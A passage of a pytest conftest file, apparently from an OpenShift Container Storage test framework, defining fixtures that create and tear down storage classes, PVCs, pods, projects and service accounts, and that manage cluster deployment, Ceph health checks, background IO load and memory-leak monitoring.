compression=None,
new_rbd_pool=False,
pool_name=None,
rbd_thick_provision=False,
encrypted=False,
encryption_kms_id=None,
):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
secret (object): An OCS instance for the secret.
custom_data (dict): If provided then storageclass object is created
by using these data. Parameters `block_pool` and `secret`
                are not used, but references are set if provided.
sc_name (str): Name of the storage class
replica (int): Replica size for a pool
compression (str): Compression type option for a pool
new_rbd_pool (bool): True if user wants to create new rbd pool for SC
pool_name (str): Existing pool name to create the storageclass other
                than the default rbd pool.
rbd_thick_provision (bool): True to enable RBD thick provisioning.
Applicable if interface is CephBlockPool
encrypted (bool): True to enable RBD PV encryption
encryption_kms_id (str): Key value of vault config to be used from
csi-kms-connection-details configmap
Returns:
object: helpers.create_storage_class instance with links to
block_pool and secret.
"""
if custom_data:
sc_obj = helpers.create_resource(**custom_data)
else:
secret = secret or secret_factory(interface=interface)
if interface == constants.CEPHBLOCKPOOL:
if config.ENV_DATA.get("new_rbd_pool") or new_rbd_pool:
pool_obj = ceph_pool_factory(
interface=interface,
replica=config.ENV_DATA.get("replica") or replica,
compression=config.ENV_DATA.get("compression") or compression,
)
interface_name = pool_obj.name
else:
if pool_name is None:
interface_name = helpers.default_ceph_block_pool()
else:
interface_name = pool_name
elif interface == constants.CEPHFILESYSTEM:
interface_name = helpers.get_cephfs_data_pool_name()
sc_obj = helpers.create_storage_class(
interface_type=interface,
interface_name=interface_name,
secret_name=secret.name,
sc_name=sc_name,
reclaim_policy=reclaim_policy,
rbd_thick_provision=rbd_thick_provision,
encrypted=encrypted,
encryption_kms_id=encryption_kms_id,
)
assert sc_obj, f"Failed to create {interface} storage class"
sc_obj.secret = secret
instances.append(sc_obj)
return sc_obj
def finalizer():
"""
Delete the storageclass
"""
for instance in instances:
instance.delete()
instance.ocp.wait_for_delete(instance.name)
request.addfinalizer(finalizer)
return factory
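# Hedged usage sketch (hypothetical test, not part of this conftest): creating
# a compressed RBD storage class backed by a new pool through the factory
# above; the compression mode value is illustrative.
def _example_compressed_rbd_storageclass(storageclass_factory):
    return storageclass_factory(
        interface=constants.CEPHBLOCKPOOL,
        new_rbd_pool=True,
        replica=2,
        compression="aggressive",
    )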
@pytest.fixture(scope="class")
def project_factory_class(request):
return project_factory_fixture(request)
@pytest.fixture(scope="session")
def project_factory_session(request):
return project_factory_fixture(request)
@pytest.fixture()
def project_factory(request):
return project_factory_fixture(request)
@pytest.fixture()
def project(project_factory):
"""
This fixture creates a single project instance.
"""
project_obj = project_factory()
return project_obj
def project_factory_fixture(request):
"""
Create a new project factory.
Calling this fixture creates new project.
"""
instances = []
def factory(project_name=None):
"""
Args:
project_name (str): The name for the new project
Returns:
object: ocs_ci.ocs.resources.ocs instance of 'Project' kind.
"""
proj_obj = helpers.create_project(project_name=project_name)
instances.append(proj_obj)
return proj_obj
def finalizer():
delete_projects(instances)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="function")
def teardown_project_factory(request):
return teardown_project_factory_fixture(request)
def teardown_project_factory_fixture(request):
"""
Tearing down a project that was created during the test
To use this factory, you'll need to pass 'teardown_project_factory' to your test
function and call it in your test when a new project was created and you
want it to be removed in teardown phase:
def test_example(self, teardown_project_factory):
project_obj = create_project(project_name="xyz")
teardown_project_factory(project_obj)
"""
instances = []
def factory(resource_obj):
"""
Args:
resource_obj (OCP object or list of OCP objects) : Object to teardown after the test
"""
if isinstance(resource_obj, list):
instances.extend(resource_obj)
else:
instances.append(resource_obj)
def finalizer():
delete_projects(instances)
request.addfinalizer(finalizer)
return factory
def delete_projects(instances):
"""
Delete the project
instances (list): list of OCP objects (kind is Project)
"""
for instance in instances:
try:
ocp_event = ocp.OCP(kind="Event", namespace=instance.namespace)
events = ocp_event.get()
event_count = len(events["items"])
warn_event_count = 0
for event in events["items"]:
if event["type"] == "Warning":
warn_event_count += 1
log.info(
(
"There were %d events in %s namespace before it's"
" removal (out of which %d were of type Warning)."
" For a full dump of this event list, see DEBUG logs."
),
event_count,
instance.namespace,
warn_event_count,
)
except Exception:
# we don't want any problem to disrupt the teardown itself
log.exception("Failed to get events for project %s", instance.namespace)
ocp.switch_to_default_rook_cluster_project()
instance.delete(resource_name=instance.namespace)
instance.wait_for_delete(instance.namespace, timeout=300)
@pytest.fixture(scope="class")
def pvc_factory_class(request, project_factory_class):
return pvc_factory_fixture(request, project_factory_class)
@pytest.fixture(scope="session")
def pvc_factory_session(request, project_factory_session):
return pvc_factory_fixture(request, project_factory_session)
@pytest.fixture(scope="function")
def pvc_factory(request, project_factory):
return pvc_factory_fixture(
request,
project_factory,
)
def pvc_factory_fixture(request, project_factory):
"""
Create a persistent Volume Claim factory. Calling this fixture creates new
PVC. For custom PVC provide 'storageclass' parameter.
"""
instances = []
active_project = None
active_rbd_storageclass = None
active_cephfs_storageclass = None
def factory(
interface=constants.CEPHBLOCKPOOL,
project=None,
storageclass=None,
size=None,
access_mode=constants.ACCESS_MODE_RWO,
custom_data=None,
status=constants.STATUS_BOUND,
volume_mode=None,
size_unit="Gi",
):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
project (object): ocs_ci.ocs.resources.ocs.OCS instance
of 'Project' kind.
storageclass (object): ocs_ci.ocs.resources.ocs.OCS instance
of 'StorageClass' kind.
size (int): The requested size for the PVC
access_mode (str): ReadWriteOnce, ReadOnlyMany or ReadWriteMany.
This decides the access mode to be used for the PVC.
ReadWriteOnce is default.
custom_data (dict): If provided then PVC object is created
by using these data. Parameters `project` and `storageclass`
are not used but reference is set if provided.
status (str): If provided then factory waits for object to reach
desired state.
volume_mode (str): Volume mode for PVC.
eg: volume_mode='Block' to create rbd `block` type volume
size_unit (str): PVC size unit, eg: "Mi"
Returns:
object: helpers.create_pvc instance.
"""
if custom_data:
pvc_obj = PVC(**custom_data)
pvc_obj.create(do_reload=False)
else:
nonlocal active_project
nonlocal active_rbd_storageclass
nonlocal active_cephfs_storageclass
project = project or active_project or project_factory()
active_project = project
if interface == constants.CEPHBLOCKPOOL:
storageclass = storageclass or helpers.default_storage_class(
interface_type=interface
)
active_rbd_storageclass = storageclass
elif interface == constants.CEPHFILESYSTEM:
storageclass = storageclass or helpers.default_storage_class(
interface_type=interface
)
active_cephfs_storageclass = storageclass
pvc_size = f"{size}{size_unit}" if size else None
pvc_obj = helpers.create_pvc(
sc_name=storageclass.name,
namespace=project.namespace,
size=pvc_size,
do_reload=False,
access_mode=access_mode,
volume_mode=volume_mode,
)
assert pvc_obj, "Failed to create PVC"
if status:
helpers.wait_for_resource_state(pvc_obj, status)
pvc_obj.storageclass = storageclass
pvc_obj.project = project
pvc_obj.access_mode = access_mode
instances.append(pvc_obj)
return pvc_obj
def finalizer():
"""
Delete the PVC
"""
pv_objs = []
        # Get PV from PVC instances and delete PVCs
for instance in instances:
if not instance.is_deleted:
pv_objs.append(instance.backed_pv_obj)
instance.delete()
instance.ocp.wait_for_delete(instance.name)
# Wait for PVs to delete
# If they have ReclaimPolicy set to Retain then delete them manually
for pv_obj in pv_objs:
if (
pv_obj.data.get("spec").get("persistentVolumeReclaimPolicy")
== constants.RECLAIM_POLICY_RETAIN
):
helpers.wait_for_resource_state(pv_obj, constants.STATUS_RELEASED)
pv_obj.delete()
pv_obj.ocp.wait_for_delete(pv_obj.name)
else:
pv_obj.ocp.wait_for_delete(resource_name=pv_obj.name, timeout=180)
request.addfinalizer(finalizer)
return factory
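# Hedged usage sketch (hypothetical test, not part of this conftest): a 10 Gi
# ReadWriteMany CephFS PVC from the factory above; project and storage class
# fall back to the defaults resolved inside the factory.
def _example_cephfs_rwx_pvc(pvc_factory):
    return pvc_factory(
        interface=constants.CEPHFILESYSTEM,
        size=10,
        access_mode="ReadWriteMany",  # one of the modes listed in the docstring
    )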
@pytest.fixture(scope="class")
def pod_factory_class(request, pvc_factory_class):
return pod_factory_fixture(request, pvc_factory_class)
@pytest.fixture(scope="session")
def pod_factory_session(request, pvc_factory_session):
return pod_factory_fixture(request, pvc_factory_session)
@pytest.fixture(scope="function")
def pod_factory(request, pvc_factory):
return pod_factory_fixture(request, pvc_factory)
def pod_factory_fixture(request, pvc_factory):
"""
Create a Pod factory. Calling this fixture creates new Pod.
For custom Pods provide 'pvc' parameter.
"""
instances = []
def factory(
interface=constants.CEPHBLOCKPOOL,
pvc=None,
custom_data=None,
status=constants.STATUS_RUNNING,
node_name=None,
pod_dict_path=None,
raw_block_pv=False,
deployment_config=False,
service_account=None,
replica_count=1,
command=None,
command_args=None,
subpath=None,
):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
pvc (PVC object): ocs_ci.ocs.resources.pvc.PVC instance kind.
custom_data (dict): If provided then Pod object is created
by using these data. Parameter `pvc` is not used but reference
is set if provided.
status (str): If provided then factory waits for object to reach
desired state.
node_name (str): The name of specific node to schedule the pod
pod_dict_path (str): YAML path for the pod.
raw_block_pv (bool): True for creating raw block pv based pod,
False otherwise.
deployment_config (bool): True for DeploymentConfig creation,
False otherwise
service_account (OCS): Service account object, in case DeploymentConfig
is to be created
replica_count (int): The replica count for deployment config
command (list): The command to be executed on the pod
command_args (list): The arguments to be sent to the command running
on the pod
subpath (str): Value of subPath parameter in pod yaml
Returns:
object: helpers.create_pod instance
"""
sa_name = service_account.name if service_account else None
if custom_data:
pod_obj = helpers.create_resource(**custom_data)
else:
pvc = pvc or pvc_factory(interface=interface)
pod_obj = helpers.create_pod(
pvc_name=pvc.name,
namespace=pvc.namespace,
interface_type=interface,
node_name=node_name,
pod_dict_path=pod_dict_path,
raw_block_pv=raw_block_pv,
dc_deployment=deployment_config,
sa_name=sa_name,
replica_count=replica_count,
command=command,
command_args=command_args,
subpath=subpath,
)
assert pod_obj, "Failed to create pod"
if deployment_config:
dc_name = pod_obj.get_labels().get("name")
dc_ocp_dict = ocp.OCP(
kind=constants.DEPLOYMENTCONFIG, namespace=pod_obj.namespace
).get(resource_name=dc_name)
dc_obj = OCS(**dc_ocp_dict)
instances.append(dc_obj)
else:
instances.append(pod_obj)
if status:
helpers.wait_for_resource_state(pod_obj, status, timeout=300)
pod_obj.reload()
pod_obj.pvc = pvc
if deployment_config:
return dc_obj
return pod_obj
def finalizer():
"""
Delete the Pod or the DeploymentConfig
"""
for instance in instances:
instance.delete()
instance.ocp.wait_for_delete(instance.name)
request.addfinalizer(finalizer)
return factory
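# Hedged usage sketch (hypothetical test, not part of this conftest): the
# common pattern of creating an RBD PVC and attaching a pod to it.
def _example_rbd_pvc_with_pod(pvc_factory, pod_factory):
    pvc_obj = pvc_factory(interface=constants.CEPHBLOCKPOOL, size=5)
    return pod_factory(interface=constants.CEPHBLOCKPOOL, pvc=pvc_obj)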
@pytest.fixture(scope="class")
def teardown_factory_class(request):
return teardown_factory_fixture(request)
@pytest.fixture(scope="session")
def teardown_factory_session(request):
return teardown_factory_fixture(request)
@pytest.fixture(scope="function")
def teardown_factory(request):
return teardown_factory_fixture(request)
def teardown_factory_fixture(request):
"""
Tearing down a resource that was created during the test
To use this factory, you'll need to pass 'teardown_factory' to your test
function and call it in your test when a new resource was created and you
want it to be removed in teardown phase:
def test_example(self, teardown_factory):
pvc_obj = create_pvc()
teardown_factory(pvc_obj)
"""
instances = []
def factory(resource_obj):
"""
Args:
resource_obj (OCS object or list of OCS objects) : Object to teardown after the test
"""
if isinstance(resource_obj, list):
instances.extend(resource_obj)
else:
instances.append(resource_obj)
def finalizer():
"""
Delete the resources created in the test
"""
for instance in instances[::-1]:
if not instance.is_deleted:
reclaim_policy = (
instance.reclaim_policy if instance.kind == constants.PVC else None
)
instance.delete()
instance.ocp.wait_for_delete(instance.name)
if reclaim_policy == constants.RECLAIM_POLICY_DELETE:
helpers.validate_pv_delete(instance.backed_pv)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="class")
def service_account_factory_class(request):
return service_account_factory_fixture(request)
@pytest.fixture(scope="session")
def service_account_factory_session(request):
return service_account_factory_fixture(request)
@pytest.fixture(scope="function")
def service_account_factory(request):
return service_account_factory_fixture(request)
def service_account_factory_fixture(request):
"""
Create a service account
"""
instances = []
active_service_account_obj = None
def factory(project=None, service_account=None):
"""
Args:
project (object): ocs_ci.ocs.resources.ocs.OCS instance
of 'Project' kind.
service_account (str): service_account_name
Returns:
object: serviceaccount instance.
"""
nonlocal active_service_account_obj
if active_service_account_obj and not service_account:
return active_service_account_obj
elif service_account:
sa_obj = helpers.get_serviceaccount_obj(
sa_name=service_account, namespace=project.namespace
)
if not helpers.validate_scc_policy(
sa_name=service_account, namespace=project.namespace
):
helpers.add_scc_policy(
sa_name=service_account, namespace=project.namespace
)
sa_obj.project = project
active_service_account_obj = sa_obj
instances.append(sa_obj)
return sa_obj
else:
sa_obj = helpers.create_serviceaccount(
namespace=project.namespace,
)
sa_obj.project = project
active_service_account_obj = sa_obj
helpers.add_scc_policy(sa_name=sa_obj.name, namespace=project.namespace)
assert sa_obj, "Failed to create serviceaccount"
instances.append(sa_obj)
return sa_obj
def finalizer():
"""
Delete the service account
"""
for instance in instances:
helpers.remove_scc_policy(
sa_name=instance.name, namespace=instance.namespace
)
instance.delete()
instance.ocp.wait_for_delete(resource_name=instance.name)
request.addfinalizer(finalizer)
return factory
@pytest.fixture()
def dc_pod_factory(request, pvc_factory, service_account_factory):
"""
Create deploymentconfig pods
"""
instances = []
def factory(
interface=constants.CEPHBLOCKPOOL,
pvc=None,
service_account=None,
size=None,
custom_data=None,
node_name=None,
node_selector=None,
replica_count=1,
raw_block_pv=False,
sa_obj=None,
wait=True,
):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
pvc (PVC object): ocs_ci.ocs.resources.pvc.PVC instance kind.
service_account (str): service account name for dc_pods
size (int): The requested size for the PVC
custom_data (dict): If provided then Pod object is created
by using these data. Parameter `pvc` is not used but reference
is set if provided.
node_name (str): The name of specific node to schedule the pod
node_selector (dict): dict of key-value pair to be used for nodeSelector field
eg: {'nodetype': 'app-pod'}
replica_count (int): Replica count for deployment config
            raw_block_pv (bool): True if the pod uses a raw block PVC
sa_obj (object) : If specific service account is needed
"""
if custom_data:
dc_pod_obj = helpers.create_resource(**custom_data)
else:
pvc = pvc or pvc_factory(interface=interface, size=size)
sa_obj = sa_obj or service_account_factory(
project=pvc.project, service_account=service_account
)
dc_pod_obj = helpers.create_pod(
interface_type=interface,
pvc_name=pvc.name,
do_reload=False,
namespace=pvc.namespace,
sa_name=sa_obj.name,
dc_deployment=True,
replica_count=replica_count,
node_name=node_name,
node_selector=node_selector,
raw_block_pv=raw_block_pv,
pod_dict_path=constants.FEDORA_DC_YAML,
)
instances.append(dc_pod_obj)
log.info(dc_pod_obj.name)
if wait:
helpers.wait_for_resource_state(
dc_pod_obj, constants.STATUS_RUNNING, timeout=180
)
dc_pod_obj.pvc = pvc
return dc_pod_obj
def finalizer():
"""
Delete dc pods
"""
for instance in instances:
delete_deploymentconfig_pods(instance)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="session", autouse=True)
def polarion_testsuite_properties(record_testsuite_property, pytestconfig):
"""
Configures polarion testsuite properties for junit xml
"""
polarion_project_id = config.REPORTING["polarion"]["project_id"]
record_testsuite_property("polarion-project-id", polarion_project_id)
jenkins_build_url = config.RUN.get("jenkins_build_url")
if jenkins_build_url:
record_testsuite_property("polarion-custom-description", jenkins_build_url)
polarion_testrun_name = get_testrun_name()
record_testsuite_property("polarion-testrun-id", polarion_testrun_name)
record_testsuite_property("polarion-testrun-status-id", "inprogress")
record_testsuite_property("polarion-custom-isautomated", "True")
@pytest.fixture(scope="session", autouse=True)
def additional_testsuite_properties(record_testsuite_property, pytestconfig):
"""
Configures additional custom testsuite properties for junit xml
"""
# add logs url
logs_url = config.RUN.get("logs_url")
if logs_url:
record_testsuite_property("logs-url", logs_url)
# add run_id
record_testsuite_property("run_id", config.RUN["run_id"])
# Report Portal
launch_name = reporting.get_rp_launch_name()
record_testsuite_property("rp_launch_name", launch_name)
launch_description = reporting.get_rp_launch_description()
record_testsuite_property("rp_launch_description", launch_description)
attributes = reporting.get_rp_launch_attributes()
for key, value in attributes.items():
# Prefix with `rp_` so the rp_preproc upload script knows to use the property
record_testsuite_property(f"rp_{key}", value)
launch_url = config.REPORTING.get("rp_launch_url")
if launch_url:
record_testsuite_property("rp_launch_url", launch_url)
@pytest.fixture(scope="session")
def tier_marks_name():
"""
Gets the tier mark names
Returns:
list: list of tier mark names
"""
tier_marks_name = []
for each_tier in tier_marks:
try:
tier_marks_name.append(each_tier.name)
except AttributeError:
tier_marks_name.append(each_tier().args[0].name)
return tier_marks_name
@pytest.fixture(scope="function", autouse=True)
def health_checker(request, tier_marks_name):
skipped = False
dev_mode = config.RUN["cli_params"].get("dev_mode")
if dev_mode:
log.info("Skipping health checks for development mode")
return
def finalizer():
if not skipped:
try:
teardown = config.RUN["cli_params"]["teardown"]
skip_ocs_deployment = config.ENV_DATA["skip_ocs_deployment"]
mcg_only_deployment = config.ENV_DATA["mcg_only_deployment"]
if not (teardown or skip_ocs_deployment or mcg_only_deployment):
ceph_health_check_base()
log.info("Ceph health check passed at teardown")
except CephHealthException:
log.info("Ceph health check failed at teardown")
# Retrying to increase the chance the cluster health will be OK
# for next test
ceph_health_check()
raise
node = request.node
request.addfinalizer(finalizer)
for mark in node.iter_markers():
if mark.name in tier_marks_name:
log.info("Checking for Ceph Health OK ")
try:
status = ceph_health_check_base()
if status:
log.info("Ceph health check passed at setup")
return
except CephHealthException:
skipped = True
# skip because ceph is not in good health
pytest.skip("Ceph health check failed at setup")
@pytest.fixture(scope="session", autouse=True)
def cluster(request, log_cli_level):
"""
This fixture initiates deployment for both OCP and OCS clusters.
Specific platform deployment classes will handle the fine details
of action
"""
log.info(f"All logs located at {ocsci_log_path()}")
teardown = config.RUN["cli_params"]["teardown"]
deploy = config.RUN["cli_params"]["deploy"]
if teardown or deploy:
factory = dep_factory.DeploymentFactory()
deployer = factory.get_deployment()
# Add a finalizer to teardown the cluster after test execution is finished
if teardown:
def cluster_teardown_finalizer():
# If KMS is configured, clean up the backend resources
# we are doing it before OCP cleanup
if config.DEPLOYMENT.get("kms_deployment"):
kms = KMS.get_kms_deployment()
kms.cleanup()
deployer.destroy_cluster(log_cli_level)
request.addfinalizer(cluster_teardown_finalizer)
log.info("Will teardown cluster because --teardown was provided")
# Download client
if config.DEPLOYMENT["skip_download_client"]:
log.info("Skipping client download")
else:
force_download = (
config.RUN["cli_params"].get("deploy")
and config.DEPLOYMENT["force_download_client"]
)
get_openshift_client(force_download=force_download)
# set environment variable for early testing of RHCOS
if config.ENV_DATA.get("early_testing"):
release_img = config.ENV_DATA["RELEASE_IMG"]
log.info(f"Running early testing of RHCOS with release image: {release_img}")
os.environ["RELEASE_IMG"] = release_img
os.environ["OPENSHIFT_INSTALL_RELEASE_IMAGE_OVERRIDE"] = release_img
if deploy:
# Deploy cluster
deployer.deploy_cluster(log_cli_level)
else:
if config.ENV_DATA["platform"] == constants.IBMCLOUD_PLATFORM:
ibmcloud.login()
@pytest.fixture(scope="class")
def environment_checker(request):
node = request.node
# List of marks for which we will ignore the leftover checker
marks_to_ignore = [m.mark for m in [deployment, ignore_leftovers]]
# app labels of resources to be excluded for leftover check
exclude_labels = [constants.must_gather_pod_label]
for mark in node.iter_markers():
if mark in marks_to_ignore:
return
if mark.name == ignore_leftover_label.name:
exclude_labels.extend(list(mark.args))
request.addfinalizer(
partial(get_status_after_execution, exclude_labels=exclude_labels)
)
get_status_before_execution(exclude_labels=exclude_labels)
@pytest.fixture(scope="session")
def log_cli_level(pytestconfig):
"""
Retrieves the log_cli_level set in pytest.ini
Returns:
str: log_cli_level set in pytest.ini or DEBUG if not set
"""
return pytestconfig.getini("log_cli_level") or "DEBUG"
@pytest.fixture(scope="session", autouse=True)
def cluster_load(
request,
project_factory_session,
pvc_factory_session,
service_account_factory_session,
pod_factory_session,
):
"""
Run IO during the test execution
"""
cl_load_obj = None
io_in_bg = config.RUN.get("io_in_bg")
log_utilization = config.RUN.get("log_utilization")
io_load = config.RUN.get("io_load")
cluster_load_error = None
cluster_load_error_msg = (
"Cluster load might not work correctly during this run, because "
"it failed with an exception: %s"
)
# IO load should not happen during deployment
    deployment_test = "deployment" in request.node.items[0].location[0]
if io_in_bg and not deployment_test:
io_load = int(io_load) * 0.01
log.info(wrap_msg("Tests will be running while IO is in the background"))
log.info(
"Start running IO in the background. The amount of IO that "
"will be written is going to be determined by the cluster "
"capabilities according to its limit"
)
try:
cl_load_obj = ClusterLoad(
project_factory=project_factory_session,
sa_factory=service_account_factory_session,
pvc_factory=pvc_factory_session,
pod_factory=pod_factory_session,
target_percentage=io_load,
)
cl_load_obj.reach_cluster_load_percentage()
except Exception as ex:
log.error(cluster_load_error_msg, ex)
cluster_load_error = ex
if (log_utilization or io_in_bg) and not deployment_test:
if not cl_load_obj:
try:
cl_load_obj = ClusterLoad()
except Exception as ex:
log.error(cluster_load_error_msg, ex)
cluster_load_error = ex
config.RUN["load_status"] = "running"
def finalizer():
"""
Stop the thread that executed watch_load()
"""
config.RUN["load_status"] = "finished"
if thread:
thread.join()
if cluster_load_error:
raise cluster_load_error
request.addfinalizer(finalizer)
def watch_load():
"""
Watch the cluster load by monitoring the cluster latency.
Print the cluster utilization metrics every 15 seconds.
If IOs are running in the test background, dynamically adjust
the IO load based on the cluster latency.
"""
while config.RUN["load_status"] != "finished":
time.sleep(20)
try:
cl_load_obj.print_metrics(mute_logs=True)
if io_in_bg:
if config.RUN["load_status"] == "running":
cl_load_obj.adjust_load_if_needed()
elif config.RUN["load_status"] == "to_be_paused":
cl_load_obj.reduce_load(pause=True)
config.RUN["load_status"] = "paused"
elif config.RUN["load_status"] == "to_be_reduced":
cl_load_obj.reduce_load(pause=False)
config.RUN["load_status"] = "reduced"
elif config.RUN["load_status"] == "to_be_resumed":
cl_load_obj.resume_load()
config.RUN["load_status"] = "running"
# Any type of exception should be caught and we should continue.
# We don't want any test to fail
except Exception:
continue
thread = threading.Thread(target=watch_load)
thread.start()
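# State machine driven through config.RUN["load_status"] by the fixture above
# and by the pause/reduce helpers below:
#   running -> to_be_paused  -> paused  -> to_be_resumed -> running
#   running -> to_be_reduced -> reduced -> to_be_resumed -> running
#   <any>   -> finished  (set by the finalizer; stops the watch_load() thread)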
def resume_cluster_load_implementation():
"""
Resume cluster load implementation
"""
config.RUN["load_status"] = "to_be_resumed"
try:
for load_status in TimeoutSampler(300, 3, config.RUN.get, "load_status"):
if load_status == "running":
break
except TimeoutExpiredError:
log.error("Cluster load was not resumed successfully")
def reduce_cluster_load_implementation(request, pause, resume=True):
"""
Pause/reduce the background cluster load
Args:
pause (bool): True for completely pausing the cluster load, False for reducing it by 50%
resume (bool): True for resuming the cluster load upon teardown, False for not resuming
"""
if config.RUN.get("io_in_bg"):
def finalizer():
"""
Resume the cluster load
"""
if resume:
resume_cluster_load_implementation()
request.addfinalizer(finalizer)
config.RUN["load_status"] = "to_be_paused" if pause else "to_be_reduced"
try:
for load_status in TimeoutSampler(300, 3, config.RUN.get, "load_status"):
if load_status in ["paused", "reduced"]:
break
except TimeoutExpiredError:
log.error(
f"Cluster load was not {'paused' if pause else 'reduced'} successfully"
)
@pytest.fixture()
def pause_cluster_load(request):
"""
Pause the background cluster load without resuming it
"""
reduce_cluster_load_implementation(request=request, pause=True, resume=False)
@pytest.fixture()
def resume_cluster_load(request):
"""
Resume the background cluster load
"""
if config.RUN.get("io_in_bg"):
def finalizer():
"""
Resume the cluster load
"""
resume_cluster_load_implementation()
request.addfinalizer(finalizer)
@pytest.fixture()
def pause_and_resume_cluster_load(request):
"""
Pause the background cluster load and resume it in teardown to the original load value
"""
reduce_cluster_load_implementation(request=request, pause=True)
@pytest.fixture()
def reduce_and_resume_cluster_load(request):
"""
Reduce the background cluster load to be 50% of what it is and resume the load in teardown
to the original load value
"""
reduce_cluster_load_implementation(request=request, pause=False)
@pytest.fixture(
params=[
pytest.param({"interface": constants.CEPHBLOCKPOOL}),
pytest.param({"interface": constants.CEPHFILESYSTEM}),
],
ids=["RBD", "CephFS"],
)
def interface_iterate(request):
"""
Iterate over interfaces - CephBlockPool and CephFileSystem
"""
return request.param["interface"]
@pytest.fixture(scope="class")
def multi_pvc_factory_class(project_factory_class, pvc_factory_class):
return multi_pvc_factory_fixture(project_factory_class, pvc_factory_class)
@pytest.fixture(scope="session")
def multi_pvc_factory_session(project_factory_session, pvc_factory_session):
return multi_pvc_factory_fixture(project_factory_session, pvc_factory_session)
@pytest.fixture(scope="function")
def multi_pvc_factory(project_factory, pvc_factory):
return multi_pvc_factory_fixture(project_factory, pvc_factory)
def multi_pvc_factory_fixture(project_factory, pvc_factory):
"""
Create a Persistent Volume Claims factory. Calling this fixture creates a
    set of new PVCs. Options for PVC creation based on provided access modes:
1. For each PVC, choose random value from the list of access modes
2. Create PVCs based on the specified distribution number of access modes.
Create sets of PVCs based on the order of access modes.
3. Create PVCs based on the specified distribution number of access modes.
The order of PVC creation is independent of access mode.
"""
def factory(
interface=constants.CEPHBLOCKPOOL,
project=None,
storageclass=None,
size=None,
access_modes=None,
access_modes_selection="distribute_sequential",
access_mode_dist_ratio=None,
status=constants.STATUS_BOUND,
num_of_pvc=1,
wait_each=False,
timeout=60,
):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
project (object): ocs_ci.ocs.resources.ocs.OCS instance
of 'Project' kind.
storageclass (object): ocs_ci.ocs.resources.ocs.OCS instance
of 'StorageClass' kind.
size (int): The requested size for the PVC
access_modes (list): List of access modes. One of the access modes
will be chosen for creating each PVC. If not specified,
ReadWriteOnce will be selected for all PVCs. To specify
volume mode, append volume mode in the access mode name
separated by '-'.
eg: ['ReadWriteOnce', 'ReadOnlyMany', 'ReadWriteMany',
'ReadWriteMany-Block']
access_modes_selection (str): Decides how to select accessMode for
each PVC from the options given in 'access_modes' list.
                Values are 'select_random', 'distribute_random' and 'distribute_sequential'.
'select_random' : While creating each PVC, one access mode will
be selected from the 'access_modes' list.
'distribute_random' : The access modes in the list
'access_modes' will be distributed based on the values in
'distribute_ratio' and the order in which PVCs are created
will not be based on the access modes. For example, 1st and
6th PVC might have same access mode.
'distribute_sequential' :The access modes in the list
'access_modes' will be distributed based on the values in
'distribute_ratio' and the order in which PVCs are created
                will be as sets of PVCs of the same access mode. For example,
first set of 10 will be having same access mode followed by
next set of 13 with a different access mode.
access_mode_dist_ratio (list): Contains the number of PVCs to be
created for each access mode. If not specified, the given list
of access modes will be equally distributed among the PVCs.
eg: [10,12] for num_of_pvc=22 and
access_modes=['ReadWriteOnce', 'ReadWriteMany']
status (str): If provided then factory waits for object to reach
desired state.
num_of_pvc(int): Number of PVCs to be created
wait_each(bool): True to wait for each PVC to be in status 'status'
before creating next PVC, False otherwise
timeout(int): Time in seconds to wait
Returns:
list: objects of PVC class.
"""
pvc_list = []
if wait_each:
status_tmp = status
else:
status_tmp = ""
project = project or project_factory()
storageclass = storageclass or helpers.default_storage_class(
interface_type=interface
)
access_modes = access_modes or [constants.ACCESS_MODE_RWO]
access_modes_list = []
if access_modes_selection == "select_random":
for _ in range(num_of_pvc):
mode = random.choice(access_modes)
access_modes_list.append(mode)
else:
if not access_mode_dist_ratio:
num_of_modes = len(access_modes)
dist_val = floor(num_of_pvc / num_of_modes)
access_mode_dist_ratio = [dist_val] * num_of_modes
access_mode_dist_ratio[-1] = dist_val + (num_of_pvc % num_of_modes)
zipped_share = list(zip(access_modes, access_mode_dist_ratio))
for mode, share in zipped_share:
access_modes_list.extend([mode] * share)
if access_modes_selection == "distribute_random":
random.shuffle(access_modes_list)
for access_mode in access_modes_list:
if "-" in access_mode:
access_mode, volume_mode = access_mode.split("-")
else:
volume_mode = ""
pvc_obj = pvc_factory(
interface=interface,
project=project,
storageclass=storageclass,
size=size,
access_mode=access_mode,
status=status_tmp,
volume_mode=volume_mode,
)
pvc_list.append(pvc_obj)
pvc_obj.project = project
if status and not wait_each:
for pvc_obj in pvc_list:
helpers.wait_for_resource_state(pvc_obj, status, timeout=timeout)
return pvc_list
return factory
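# Illustrative usage sketch (not part of the fixture itself): a hypothetical
# test requesting five CephFS PVCs with a 3:2 split of access modes created
# sequentially. The test name and numbers below are examples only.
#
#     def test_multi_pvc_example(multi_pvc_factory):
#         pvcs = multi_pvc_factory(
#             interface=constants.CEPHFILESYSTEM,
#             access_modes=["ReadWriteOnce", "ReadWriteMany"],
#             access_modes_selection="distribute_sequential",
#             access_mode_dist_ratio=[3, 2],
#             num_of_pvc=5,
#         )
#         assert len(pvcs) == 5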
@pytest.fixture(scope="function")
def memory_leak_function(request):
"""
Function to start a memory leak monitoring thread, which runs in parallel with the test
Memory leak data is captured on all worker nodes for the ceph-osd process
Data is appended to the /tmp/(worker)-top-output.txt file for each worker
During teardown the created tmp files are deleted
Usage:
test_case(.., memory_leak_function):
.....
median_dict = helpers.get_memory_leak_median_value()
.....
TC execution part, memory_leak_fun will capture data
....
helpers.memory_leak_analysis(median_dict)
....
"""
def finalizer():
"""
Finalizer to stop memory leak data capture thread and cleanup the files
"""
set_flag_status("terminated")
try:
for status in TimeoutSampler(90, 3, get_flag_status):
if status == "terminated":
break
except TimeoutExpiredError:
log.warning(
"Background test execution still in progress before"
"memory leak thread terminated"
)
if thread:
thread.join()
log_path = ocsci_log_path()
for worker in node.get_worker_nodes():
if os.path.exists(f"/tmp/{worker}-top-output.txt"):
copyfile(
f"/tmp/{worker}-top-output.txt",
f"{log_path}/{worker}-top-output.txt",
)
